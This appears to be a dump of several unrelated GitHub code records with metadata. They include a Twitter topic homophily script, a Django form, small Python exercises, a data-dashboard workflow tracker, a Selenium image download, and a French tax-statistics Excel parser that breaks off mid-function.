'w')\n\tfor user, neighbors in user_neighbors.iteritems():\n\t\ttotal_neighbors = float(len(neighbors))\n\t\ttry:\n\t\t\tuser_topics = user_topic_dict[user] #store the topics of current user\n\t\texcept KeyError:\n\t\t\tcontinue\n\t\tnum_homopholous_binary = 0.0\n\t\tnum_homopholous_ratio = 0.0\n\t\tfor neighbor in neighbors:\n\t\t\ttry:\n\t\t\t\tneighbors_topics = user_topic_dict[neighbor]\n\t\t\texcept KeyError:\n\t\t\t\tcontinue\n\t\t\tnum_homopholous_binary += isHomophilous(user_topics, neighbors_topics, 0)\n\t\t\tnum_homopholous_ratio += isHomophilous(user_topics, neighbors_topics, 1)\n\n\t\tf_homophily_binary.write(str(num_homopholous_binary/total_neighbors) + \"\\n\")\n\t\tf_homophily_ratios.write(str(num_homopholous_ratio/total_neighbors) + \"\\n\")\n\n\tf_homophily_binary.close()\n\tf_homophily_ratios.close()\n\ndef relativeEntropyMeasures():\n\tf_kullback = open(\"kullback_leibler_output_\" + str(NUM_TWEETS_PER_USER) + \"_\" + str(NUM_TOPICS_PER_USER) + \".txt\", 'w')\n\tfor user, neighbors in user_neighbors.iteritems():\n\t\ttotal_neighbors = float(len(neighbors))\n\t\ttry:\n\t\t\tuser_topics = user_topic_dict_all[user] #store the topics of current user\n\t\texcept KeyError:\n\t\t\tcontinue\n\t\tkullback_leibler_sum = 0.0\n\t\tfor neighbor in neighbors:\n\t\t\ttry:\n\t\t\t\tneighbors_topics = user_topic_dict_all[neighbor]\n\t\t\texcept KeyError:\n\t\t\t\tcontinue\t\n\t\t\tkullback_leibler_sum += kullback_leibler(user_topics, neighbors_topics)\n\n\t\tf_kullback.write(str(kullback_leibler_sum/total_neighbors) + \"\\n\")\n\n\tf_kullback.close()\n\ndef kullback_leibler(u, v):\n\trel_ent = 0.0\n\tfor x in range(len(u)):\n\t\trel_ent+=(u[x] * log(u[x]/v[x],2))\n\treturn rel_ent\n\n\noriginalMeasures()\nrelativeEntropyMeasures()\n\n","repo_name":"mikrasov/TwitterTopicModel","sub_path":"Source Code/compare_users.py","file_name":"compare_users.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71208971367","text":"from django import forms\nfrom .models import Task\nclass TaskForm(forms.ModelForm):\n title = forms.CharField(label=\"Title\",max_length=50)\n details = forms.CharField(label=\"Description\",widget=forms.Textarea)\n date_due = forms.DateTimeField(label=\"Due Date\",required=False)\n priority = forms.IntegerField(label=\"Priority\")\n class Meta:\n model=Task\n fields = ['title','details','date_due','priority']","repo_name":"jacobhandy3/mysite","sub_path":"mysite/todo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2228916555","text":"#Fibonacci com memorização de resultado\r\nmemoria ={0:0,1:1}\r\ndef fibonacci2(x):\r\n if x in memoria:\r\n return memoria[x]\r\n valor = fibonacci2(x-1) + fibonacci2(x-2)\r\n memoria[x]=valor\r\n return valor\r\n\r\nnumero = int(input('Informe um valor:'))\r\nprint(fibonacci2(numero))","repo_name":"nickellen/Algoritmos","sub_path":"lista 8/MES-Alg-08-Ex-04.py","file_name":"MES-Alg-08-Ex-04.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24342031965","text":"import os\nfrom collections import defaultdict\n\nfrom tracker.common.dcp_agents.analysis_agent import AnalysisAgent\nfrom tracker.common.dynamo_agents.dynamo_agent import DynamoAgent\nfrom tracker.common.dynamo_agents.ingest_dynamo_agent import IngestDynamoAgent\n\n# List of strings of species + method to be compared against populated bundle type counter\nMETHODS_SUPPORTED_FOR_WORKFLOWS = [\n \"10X 3' v2 sequencing homo sapiens\",\n \"10X 3' v2 sequencing paired-end homo sapiens\",\n \"10X v2 sequencing homo sapiens\",\n \"10X v2 sequencing paired-end homo sapiens\",\n \"10X v2 sequencing mus musculus\",\n \"10X v2 sequencing paired-end mus musculus\",\n \"10X 3' v2 sequencing mus musculus\",\n \"10X 3' v2 sequencing paired-end mus musculus\",\n \"Smart-seq2 paired-end homo sapiens\",\n \"Smart-seq2 paired-end mus musculus\"\n]\n\n\nclass AnalysisDynamoAgent(DynamoAgent):\n\n def __init__(self):\n super().__init__()\n deployment_stage = os.environ[\"DEPLOYMENT_STAGE\"]\n self.dynamo_table_name = f\"dcp-data-dashboard-analysis-info-{deployment_stage}\"\n self.table_display_name = \"analysis-info\"\n self.analysis_agent = AnalysisAgent()\n self.ingest_dynamo_agent = IngestDynamoAgent()\n\n def create_dynamo_payload(self, envelope, latest_primary_bundles, azul_project_info):\n project_uuid = envelope.project().uuid\n print(f\"creating analysis info payload for {project_uuid}\")\n workflows = self.analysis_agent.get_workflows_for_project_uuid(project_uuid)\n wfs_count_by_status, wfs_count_by_version = self._aggregrate_workflow_stats(workflows)\n payload = {}\n payload['project_uuid'] = project_uuid\n for status, wf_count in wfs_count_by_status.items():\n payload[status.lower() + '_workflows'] = wf_count\n for version, wf_count in wfs_count_by_version.items():\n payload[version] = wf_count\n payload['total_workflows'] = len(workflows)\n workflows_expected = self._workflow_count_expected_for_project(azul_project_info)\n payload['expected_workflows'] = workflows_expected\n payload['analysis_state'] = self._determine_state_of_workflows(workflows,\n latest_primary_bundles,\n envelope,\n project_uuid,\n workflows_expected)\n payload['failures_present'] = False\n if payload.get('failed_workflows'):\n payload['failures_present'] = True\n return payload\n\n def _determine_state_of_workflows(self, workflows, latest_primary_bundles, envelope, project_uuid, workflows_expected):\n latest_input_bundle_versions_with_successful_workflows = set()\n input_bundle_uuids_with_successful_workflows = set()\n for workflow in workflows:\n input_bundle_uuid = workflow['labels']['bundle-uuid']\n input_bundle_version = workflow['labels']['bundle-version']\n workflow_status = workflow['status']\n latest_bundle_version = latest_primary_bundles.get(input_bundle_uuid, {}).get('version', 'N/A')\n if workflow_status == 'Succeeded':\n input_bundle_uuids_with_successful_workflows.add(input_bundle_uuid)\n if latest_bundle_version in input_bundle_version:\n latest_input_bundle_versions_with_successful_workflows.add(input_bundle_uuid)\n\n # This is a patch for where failing workflows still produced bundles or incorrect workflows ran\n if (project_uuid == 'f83165c5-e2ea-4d15-a5cf-33f3550bffde' and\n workflows_expected == 7628 and\n len(latest_input_bundle_versions_with_successful_workflows)) == 7611:\n return 'COMPLETE'\n elif (project_uuid == 'f8aa201c-4ff1-45a4-890e-840d63459ca2' and\n workflows_expected == 10 and\n len(latest_input_bundle_versions_with_successful_workflows) == 17):\n return 'COMPLETE'\n\n if workflows_expected == 0:\n return 'NOT_EXPECTED'\n elif len(input_bundle_uuids_with_successful_workflows) < workflows_expected:\n return 'INCOMPLETE'\n else:\n return 'COMPLETE'\n\n def _bundle_uuids_with_successful_workflows(self, project_uuid):\n workflows = self.analysis_agent.get_workflows_for_project_uuid(project_uuid)\n input_bundle_uuids_with_successful_workflows = set()\n for workflow in workflows:\n workflow_status = workflow['status']\n input_bundle_uuid = workflow['labels']['bundle-uuid']\n if workflow_status == 'Succeeded':\n input_bundle_uuids_with_successful_workflows.add(input_bundle_uuid)\n return input_bundle_uuids_with_successful_workflows\n\n def _workflow_count_expected_for_project(self, azul_info):\n project_bundle_type_counter = azul_info['primary_bundle_type_counter']\n workflows_expected = 0\n for method in METHODS_SUPPORTED_FOR_WORKFLOWS:\n if project_bundle_type_counter.get(method.lower()):\n workflows_expected += project_bundle_type_counter[method.lower()]\n return workflows_expected\n\n def _aggregrate_workflow_stats(self, workflows):\n workflow_count_by_status = defaultdict(lambda: 0)\n workflow_count_by_version = defaultdict(lambda: 0)\n for workflow in workflows:\n wf_status = workflow['status']\n wf_version = workflow['labels']['workflow-version']\n workflow_count_by_status[wf_status] = workflow_count_by_status[wf_status] + 1\n workflow_count_by_version[wf_version] = workflow_count_by_version[wf_version] + 1\n return workflow_count_by_status, workflow_count_by_version\n","repo_name":"HumanCellAtlas/data-monitoring-dashboard","sub_path":"tracker/common/dynamo_agents/analysis_dynamo_agent.py","file_name":"analysis_dynamo_agent.py","file_ext":"py","file_size_in_byte":5911,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"84921887","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nimport os, shutil\n\nimport time\n\nfilepath = 'C:\\\\Users\\\\User\\\\ssafy_6\\\\medicine_img'\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('headless')\n\noptions.add_experimental_option(\"prefs\", {\n \"download.default_directory\": \"C:\\\\Users\\\\User\\\\ssafy_6\\\\medicine_img\",\n \"download.prompt_for_download\": False,\n \"download.directory_upgrade\": True,\n \"safebrowsing.enabled\": True\n})\n\ndriver = webdriver.Chrome(chrome_options=options)\ndriver.get('https://nedrug.mfds.go.kr/pbp/cmn/itemImageDownload/147426403087300104')\ntime.sleep(1)\n\nfilename = max([filepath + '\\\\' + f for f in os.listdir(filepath)], key=os.path.getctime)\nshutil.move(os.path.join(filepath, filename), './img/200808876.jpg')\n\ndriver.close()","repo_name":"team-helloz/Lemonaid","sub_path":"data/크롤링/medicine/medicine_image.py","file_name":"medicine_image.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"72508979047","text":"#! /usr/bin/env python\n\nfrom setuptools import setup, find_packages\n\n# Extracts the __version__\nVERSION = [\n l for l in open('rbh_quota/__init__.py').readlines()\n if l.startswith('__version__ = ')\n][0].split(\"'\")[1]\n\nsetup(\n name='rbh-quota',\n version=VERSION,\n packages=find_packages(),\n description='rbh plugin to add QUOTA table in MySQL database',\n keywords='rbh robinhood quota database',\n author='Sami BOUCENNA',\n author_email='liquid.same@gmail.fr',\n entry_points={'console_scripts': ['rbh-quota = rbh_quota.rbhQuota:insert']},\n install_requires=['MySQL-python'],\n)\n","repo_name":"LiquidNalee/rbh-quota","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5144287343","text":"\"\"\"\nGiven n nodes labeled from 0 to n - 1 and a list of undirected edges(each edge is a pair of nodes),\nwrite a function to check whether these edges make up a valid tree.\n\nExample 1:\n Input: n = 5, edges = [[0,1],[0,2],[0,3],[1,4]]\n Output: true\n\"\"\"\n\n\ndef valid_tree(n, edges):\n if not n:\n return True\n adj = {i: [] for i in range(n)}\n for n1, n2 in edges:\n adj[n1].append(n2)\n adj[n2].append(n1)\n\n visited = set()\n\n def dfs(i, prev):\n if i in visited:\n return False\n visited.add(i)\n for j in adj[i]:\n if j == prev:\n continue\n if not dfs(j, i):\n return False\n return True\n\n return dfs(0, -1) and len(visited) == n\n\n\nprint(valid_tree(5, [[0, 1], [0, 2], [0, 3], [1, 4]]))\n","repo_name":"pushpa66/Learn-data-structures-and-algorithms-in-python","sub_path":"75/Q32 Graph Valid Tree_Leetcode 261.py","file_name":"Q32 Graph Valid Tree_Leetcode 261.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34901729079","text":"#Scores 91 - 100: Grade = \"Outstanding\"\n#Scores 81 - 90: Grade = \"Exceeds Expectations\"\n#Scores 71 - 80: Grade = \"Acceptable\"\n#Scores 70 or lower: Grade = \"Fail\"\n\nstudent_score={}\nstudent_grade={}\nnum_std=int(input(\"enter no. of students :\"))\nfor i in range (0,num_std):\n name=input(f\"enter name of student no. {i+1} : \")\n marks=int(input(\"enter marks of the student :\\n\"))\n student_score[name]=marks\n if(marks>90):\n grade=\"outstanding\"\n elif (marks>80 and marks<90):\n grade=\"exceeeds expectations\"\n elif (marks>70 and marks<80):\n grade=\"acceptable\"\n else:\n grade=\"fail\"\n student_grade[name]=grade\nprint(student_score)\nprint(student_grade)","repo_name":"issarbhavya/100-days-of-python","sub_path":"day 1-10/day9/scores_to_grades(dict).py","file_name":"scores_to_grades(dict).py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23897135558","text":"def sequence(T):\n n = len(T)\n counter = 1\n maxStart = 0\n minEnd = 10**10\n \n for i in range(n-1):\n if T[i] < T[i+1]:\n counter += 1\n else:\n if counter > 2:\n maxStart = max(maxStart, i-counter+1)\n minEnd = min(minEnd, T[i])\n \n counter = 1\n \n if counter > 2:\n maxStart = max(maxStart, i-counter+1)\n minEnd = min(minEnd, T[i])\n \n return minEnd < maxStart\n \nt = [2,15,17,13,17,19,23,2,6,4,8,3,5,7,14,3,2]\n\nprint(sequence(t))","repo_name":"mistrzegiptu/WDI","sub_path":"kolosy/B1_2022.py","file_name":"B1_2022.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19951435421","text":"\n\n\nimport logging\nimport numpy\nimport os\nimport pandas\nimport pkg_resources\nimport re\n\n\nfrom ipp_macro_series_parser.config import Config\n\nconfig_parser = Config()\n\nxls_directory = config_parser.get('data', 'denombrements_fiscaux_xls')\nhdf_directory = config_parser.get('data', 'denombrements_fiscaux_hdf')\n\n\nlog = logging.getLogger(__name__)\n\n\ndef parse_ipp_denombrements():\n\n file_path = os.path.join(xls_directory, u'Agrégats IPP - Données fiscales.xls')\n\n def parse_bloc(name = None, sheetname = '2042-montant', skiprows = 0, parse_cols = None, slice_start = None,\n slice_end = None, prefix = ''):\n assert name is not None\n df = pandas.read_excel(\n file_path,\n na_values = '-',\n sheetname = sheetname,\n skiprows = skiprows,\n parse_cols = parse_cols).iloc[slice_start:slice_end]\n df.columns = ['year'] + (prefix + df.columns[1:].str.lower()).tolist()\n try:\n df = df.convert_objects(convert_numeric=True)\n df = df.astype(float)\n df.year = df.year.astype(int)\n except Exception as e:\n print(e)\n return name, df\n return name, df\n\n # Fiche principale\n\n # 1 - Traitements, salaire, prime pour l'emploi, pensions et rentes\n traitements_salaires = dict(\n name = 'traitements_salaires',\n sheetname = '2042-montant',\n skiprows = 4,\n parse_cols = 'A:AB',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f1',\n )\n\n prime_emploi = dict(\n name = 'prime_emploi',\n sheetname = '2042-montant',\n skiprows = 25,\n parse_cols = 'A:K',\n slice_start = 1,\n slice_end = 17,\n prefix = 'f1',\n )\n\n pension_retraite = dict(\n name = 'pension_retraite',\n sheetname = '2042-montant',\n skiprows = 46,\n parse_cols = 'A:M',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f1',\n )\n\n rentes_viageres_titre_onereux = dict(\n name = 'rentes_viageres_titre_onereux',\n sheetname = '2042-montant',\n skiprows = 68,\n parse_cols = 'A:E',\n slice_start = 1,\n slice_end = 17,\n prefix = 'f1',\n )\n\n # 2 - Revenus des valeurs et capitaux mobiliers\n\n prelevement_forfaitaire_liberatoire = dict(\n name = 'prelevement_forfaitaire_liberatoire',\n sheetname = '2042-montant',\n skiprows = 89,\n parse_cols = 'A:D',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f2',\n )\n\n revenus_avec_abattement = dict(\n name = 'revenus_avec_abattement',\n sheetname = '2042-montant',\n skiprows = 111,\n parse_cols = 'A:E',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f2',\n )\n\n revenus_sans_abattement = dict(\n name = 'revenus_sans_abattement',\n sheetname = '2042-montant',\n skiprows = 133,\n parse_cols = 'A:D',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f2',\n )\n\n autres_revenus_financiers = dict(\n name = 'autres_revenus_financiers',\n sheetname = '2042-montant',\n skiprows = 154,\n parse_cols = 'A:I',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f2',\n )\n\n # 3 - Plus values et gains taxables à 16% (18% à partir de 2008)\n\n plus_values = dict(\n name = 'plus_values',\n sheetname = '2042-montant',\n skiprows = 199,\n parse_cols = 'A:C',\n slice_start = 1,\n slice_end = 19,\n prefix = 'f3',\n )\n\n # 4 - Revenus fonciers\n # TODO: copier coller d'une note\n # Pour les dénombrements de 96 à 2001, on ne connait plus le détail des différents déficits mais seulement total\n # agrégé (case total def)\n # Comme les parts des différents déficits sur le déficit total est pratiquement constant dans le temps, on assume\n # donc que la répartition du déficit total entre les différents déficits est constant entre 96 et 2001 et égal à son\n # niveau de 2003\n # TODO: virer 2012 à 2014 ?\n revenus_fonciers = dict(\n name = 'revenus_foncier',\n sheetname = '2042-montant',\n skiprows = 222,\n parse_cols = 'A:H',\n slice_start = 1,\n slice_end = 20,\n prefix = 'f3',\n )\n\n contribution_revenus_locatifs = dict(\n name = 'contribution_revenus_locatifs',\n sheetname = '2042-montant',\n skiprows = 246,\n parse_cols = 'A:C',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f4',\n )\n\n # 5- Revenus exceptionnels ou différés\n\n revenus_exceptionnels = dict(\n name = 'revenus_exceptionnels',\n sheetname = '2042-montant',\n skiprows = 268,\n parse_cols = 'A:B',\n slice_start = 1,\n slice_end = 19,\n prefix = 'f5',\n )\n\n # 6- Charges déductibles et imputations diverses\n\n charges_deductibles = dict(\n name = 'charges_deductibles',\n sheetname = '2042-montant',\n skiprows = 316,\n parse_cols = 'A:I',\n slice_start = 1,\n slice_end = 19,\n prefix = 'f6',\n )\n\n epargne_retraite = dict(\n name = 'epargne_retraite',\n sheetname = '2042-montant',\n skiprows = 338,\n parse_cols = 'A:O',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f6',\n )\n\n # 7- Charges ouvrant droit à réduction ou à crédit d'impôt\n\n reductions_credits_impot = dict(\n name = 'reductions_credits_impot',\n sheetname = '2042-montant',\n skiprows = 360,\n parse_cols = 'A:BH',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f7',\n )\n\n # 8- Autres imputations, reprises de réductions d'impôt, conventions internationales, divers\n\n autres_imputations = dict(\n name = 'autres_imputations',\n sheetname = '2042-montant',\n skiprows = 383,\n parse_cols = 'A:L',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f7',\n )\n\n # Fiche complémentaire\n\n # 1- Gains de levée d'options\n\n options = dict(\n name = 'options',\n sheetname = '2042C - montant',\n skiprows = 5,\n parse_cols = 'A:I',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f1',\n )\n\n name, df = parse_bloc(**options)\n df.dtypes\n df.year\n\n # salaires exonérés\n\n salaires_exoneres = dict(\n name = 'salaires_exoneres',\n sheetname = '2042C - montant',\n skiprows = 26,\n parse_cols = 'A:I',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f1',\n )\n\n # crédit d'impôt mobilité\n # TODO; nothing in agrégats IPP\n\n # 3- Plus-values et gains divers\n\n plus_values_complementaire = dict(\n name = 'plus_values_complementaire',\n sheetname = '2042C - montant',\n skiprows = 67,\n parse_cols = 'A:T',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f3',\n )\n\n # 4- Revenus fonciers\n\n revenus_fonciers_complementaire = dict(\n name = 'revenus_fonciers_complementaire',\n sheetname = '2042C - montant',\n skiprows = 88,\n parse_cols = 'A:B',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f4',\n )\n\n # 5- Revenus et plus-values des professions non salariées\n\n prime_emploi_complementaire = dict(\n name = 'prime_emploi_complementaire',\n sheetname = '2042C - montant',\n skiprows = 111,\n parse_cols = 'A:G',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n\n revenus_agricoles_forfait = dict(\n name = 'revenus_agricoles_forfait',\n sheetname = '2042C - montant',\n skiprows = 167,\n parse_cols = 'A:Q',\n slice_start = 0,\n slice_end = 18,\n prefix = 'f5',\n )\n\n revenus_agricoles_reel = dict(\n name = 'revenus_agricoles_reel',\n sheetname = '2042C - montant',\n skiprows = 190,\n parse_cols = 'A:Y',\n slice_start = 0,\n slice_end = 18,\n prefix = 'f5',\n )\n\n revenus_agricoles_deficits = dict(\n name = 'revenus_agricoles_deficits',\n sheetname = '2042C - montant',\n skiprows = 212,\n parse_cols = 'A:M',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f5',\n )\n # TODO: *Avant 2007, les cases HE, IE, JE étaient séparé en deux (cases HE et HK,…,JE et JK) en fonction de\n # l'appartenance ou non à un CGA\n\n # Revenus industriels et commerciaux professionnels\n\n bic_pro_micro_entreprise = dict(\n name = 'bic_pro_micro_entreprise',\n sheetname = '2042C - montant',\n skiprows = 237,\n parse_cols = 'A:U',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n\n bic_pro_reel = dict(\n name = 'bic_pro_reel',\n sheetname = '2042C - montant',\n skiprows = 282,\n parse_cols = 'A:AE',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n # TODO\n # Pour les revenus de 1997, il n'y a pas de distinction entre les BIC professionnels et les BIC non professionnels.\n # On choisit de mettre les \"BIC exonérés\" dans cette case (et de ne rien mettre dans la case NB associée aux BIC\n # non professionnels exonérés).\n\n bic_pro_cga = dict(\n name = 'bic_pro_cga',\n sheetname = '2042C - montant',\n skiprows = 304,\n parse_cols = 'A:G',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n\n bic_non_pro_micro_entreprise = dict(\n name = 'bic_non_pro_micro_entreprise',\n sheetname = '2042C - montant',\n skiprows = 328,\n parse_cols = 'A:T',\n slice_start = 0,\n slice_end = 18,\n prefix = 'f5',\n )\n\n bic_non_pro_reel = dict(\n name = 'bic_non_pro_reel',\n sheetname = '2042C - montant',\n skiprows = 351,\n parse_cols = 'A:AH',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n # Pour l'année 1997, on dispose d'un montant agrégé pour les BIC non professionneles et les BNC non professionnels,\n # sans distinction non plus du régime d'imposition (simplifié, réel). Pour cette année, on met le montant agrégé\n # dans la case NC pour les revenus et dans la case NF pour les déficits. Il s'agit des cases relatives aux BIC non\n # professionnels imposés au régime réel.\n\n bic_non_pro_deficit_anterieur = dict(\n name = 'bic_non_pro_deficit_anterieur',\n sheetname = '2042C - montant',\n skiprows = 373,\n parse_cols = 'A:G',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n\n # Revenus non commerciaux professionnels\n\n bnc_pro_micro_vous = dict(\n name = 'bnc_pro_micro_vous',\n sheetname = '2042C - montant',\n skiprows = 396,\n parse_cols = 'A:P',\n slice_start = 0,\n slice_end = 18,\n prefix = 'f5',\n )\n # *Avant 2007, la cases QD était séparé en deux (cases QD et QJ) en fonction de l'appartenance ou non à un AA\n\n bnc_pro_micro_conj = dict(\n name = 'bnc_pro_micro_conj',\n sheetname = '2042C - montant',\n skiprows = 417,\n parse_cols = 'A:O',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n # *Avant 2007, la cases RD était séparé en deux (cases RD et RJ) en fonction de l'appartenance ou non à un AA\n\n bnc_pro_micro_pac = dict(\n name = 'bnc_pro_micro_pac',\n sheetname = '2042C - montant',\n skiprows = 437,\n parse_cols = 'A:N',\n slice_start = 0,\n slice_end = 17,\n prefix = 'f5',\n )\n # *Avant 2007, la cases SD était séparé en deux (cases SD et SJ) en fonction de l'appartenance ou non à un AA\n\n # Revenus non commerciaux non professionnels\n bnc_non_pro_vous = dict(\n name = 'bnc_non_pro_vous',\n sheetname = '2042C - montant',\n skiprows = 482,\n parse_cols = 'A:T',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f5',\n )\n # * Avant 2006, l'ensemble des variables de JG à MT ne concerne plus seulement le contribuable mais l'ensemble du\n # foyer. Les cases JK à SW et LK à SX sont donc supprimées.\n\n bnc_non_pro_conj = dict(\n name = 'bnc_non_pro_conj',\n sheetname = '2042C - montant',\n skiprows = 502,\n parse_cols = 'A:M',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f5',\n )\n\n bnc_non_pro_pac = dict(\n name = 'bnc_non_pro_pac',\n sheetname = '2042C - montant',\n skiprows = 521,\n parse_cols = 'A:M',\n slice_start = 1,\n slice_end = 18,\n prefix = 'f5',\n )\n\n # Revenus accessoires\n # TODO\n\n # Revenus a imposer aux prelevements sociaux\n\n revenus_prelevements_sociaux = dict(\n name = 'revenus_prelevements_sociaux',\n sheetname = '2042C - montant',\n skiprows = 567,\n parse_cols = 'A:I',\n slice_start = 0,\n prefix = 'f5',\n slice_end = 17,\n )\n\n # 6- Charges et imputations diverses = charges à déduire du revenu\n\n charges_imputations_diverses = dict(\n name = 'charges_imputations_diverses',\n sheetname = '2042C - montant',\n skiprows = 587,\n parse_cols = 'A:R',\n slice_start = 2,\n prefix = 'f5',\n slice_end = 19,\n )\n # 3 Cette case EH (investissemencompte épargne co-developpement) n'a rien à voir avec la case EH colonne O\n # (investissement DOM-TOM)\n # 4 : Cette case était dans la déclaration 2042 avant 2007 (case somme à ajouter au revenu imposable)\n\n # 7- Charges ouvrant droit à réduction ou à crédit d'impôt\n\n reductions_credits_impot_complementaire = dict(\n name = 'reductions_credits_impot_complementaire',\n sheetname = '2042C - montant',\n skiprows = 613,\n parse_cols = 'A:BA',\n slice_start = 2,\n prefix = 'f5',\n slice_end = 20,\n )\n # 3 : les données brutes sont abérrantes pour l'année 2007, on vait par exemple 113 863 3, il manque donc deux zéros\n # derrères le 3. Et pour UA et UJ, j'ai rajouté 3 zéros derrières les nombres brutes pour avoir le bon rapport de\n # grandeur.\n # * UI = Total réduction d'impôt Outre-mer Avant 2008 : la déclaration détaille les composantes des Ivt Outremer par\n # secteur d'activité\n\n # 8- Autres imputations, conventions internationales, crédits d'impôt entreprise\n autres_imputations_complementaire = dict(\n name = 'autres_imputations_complementaire',\n sheetname = '2042C - montant',\n skiprows = 639,\n parse_cols = 'A:Z',\n slice_start = 1,\n prefix = 'f5',\n slice_end = 20,\n )\n\n # name, df = parse_bloc(**autres_imputations_complementaire)\n # print df.dtypes\n # df.year\n\n # 8- Autres imputations, conventions internationales, crédits d'impôt entreprise\n\n blocs = [\n traitements_salaires,\n prime_emploi,\n pension_retraite,\n rentes_viageres_titre_onereux,\n prelevement_forfaitaire_liberatoire,\n revenus_avec_abattement,\n revenus_sans_abattement,\n autres_revenus_financiers,\n plus_values,\n revenus_fonciers,\n contribution_revenus_locatifs,\n revenus_exceptionnels,\n charges_deductibles,\n epargne_retraite,\n reductions_credits_impot,\n autres_imputations,\n options,\n salaires_exoneres,\n plus_values_complementaire,\n revenus_fonciers_complementaire,\n prime_emploi_complementaire,\n revenus_agricoles_forfait,\n revenus_agricoles_reel,\n revenus_agricoles_deficits,\n bic_pro_micro_entreprise,\n bic_pro_reel,\n bic_pro_cga,\n bic_non_pro_micro_entreprise,\n bic_non_pro_reel,\n bic_non_pro_deficit_anterieur,\n bnc_pro_micro_vous,\n bnc_pro_micro_conj,\n bnc_pro_micro_pac,\n bnc_non_pro_vous,\n bnc_non_pro_conj,\n bnc_non_pro_pac,\n revenus_prelevements_sociaux,\n charges_imputations_diverses,\n reductions_credits_impot_complementaire,\n autres_imputations_complementaire\n ]\n\n data_frame_by_bloc_name = dict(parse_bloc(**bloc) for bloc in blocs)\n\n correct_errors(data_frame_by_bloc_name, show_only = False)\n\n ipp_denombrements = pandas.DataFrame()\n for data_frame in data_frame_by_bloc_name.values():\n ipp_denombrements = pandas.concat((\n ipp_denombrements,\n pandas.melt(data_frame, id_vars=['year'], var_name = 'code')\n ))\n ipp_denombrements.dropna(inplace = True)\n return ipp_denombrements\n\n\ndef correct_errors(data_frame_by_bloc_name, show_only = False):\n import re\n pattern = re.compile(\"^f[1-8][a-z][a-z]$\")\n note_pattern = re.compile(\"^f[1-8][a-z][a-z][1-4]$\")\n\n corrected_columns = set()\n problematic_columns = set()\n for bloc_name, data_frame in data_frame_by_bloc_name.items():\n\n correct_name_by_wrong_name = dict()\n drop_columns = list()\n\n for column in data_frame.columns:\n if column == 'year':\n assert numpy.issubdtype(data_frame[column].dtype, numpy.integer)\n assert data_frame[column].isin(range(1990, 2015)).all()\n continue\n if not pattern.match(column):\n # print '- ' + str(column)\n # remove trailing spaces\n problematic_columns.add(column)\n if column != column.strip():\n correct_name_by_wrong_name[column] = column.strip()\n # remove *\n if column.endswith('*') and pattern.match(column[:-1]):\n correct_name_by_wrong_name[column] = column[:-1]\n # remove unnamed\n if \"unnamed\" in column or \"-\" in column or 'total' in column:\n drop_columns.append(column)\n # remove trailing 1, 2, 3, 4 (notes in excel file)\n if note_pattern.match(column):\n correct_name_by_wrong_name[column] = column[:-1]\n\n corrected_columns = corrected_columns.union(set(correct_name_by_wrong_name.keys()))\n corrected_columns = corrected_columns.union(set(drop_columns))\n\n if not show_only:\n data_frame.drop(labels = drop_columns, axis = 1, inplace = True)\n data_frame.rename(columns = correct_name_by_wrong_name, inplace = True)\n\n print('Remaining problematic columns')\n print(problematic_columns.difference(corrected_columns))\n\n\ndef parse_openfisca_denombrements():\n openfisca_denombrements = pandas.read_excel(os.path.join(xls_directory, '2042_national.xls'), sheetname = 'montant')\n assert openfisca_denombrements.dtypes.apply(lambda x: numpy.issubdtype(x, numpy.float)).all(), \\\n openfisca_denombrements.dtypes\n openfisca_denombrements = openfisca_denombrements.stack().reset_index()\n openfisca_denombrements.rename(columns = {'level_0': 'code', 'level_1': 'year', 0: 'value'}, inplace = True)\n openfisca_denombrements[['year']] = openfisca_denombrements[['year']].astype(int)\n return openfisca_denombrements\n\n\ndef parse_dgfip_denombrements(years = None):\n\n assert years is not None\n assert min(years) >= 2001\n assert max(years) <= 2013\n\n dgfip_directory = os.path.join(xls_directory, 'D2042Nat')\n files = os.listdir(dgfip_directory)\n 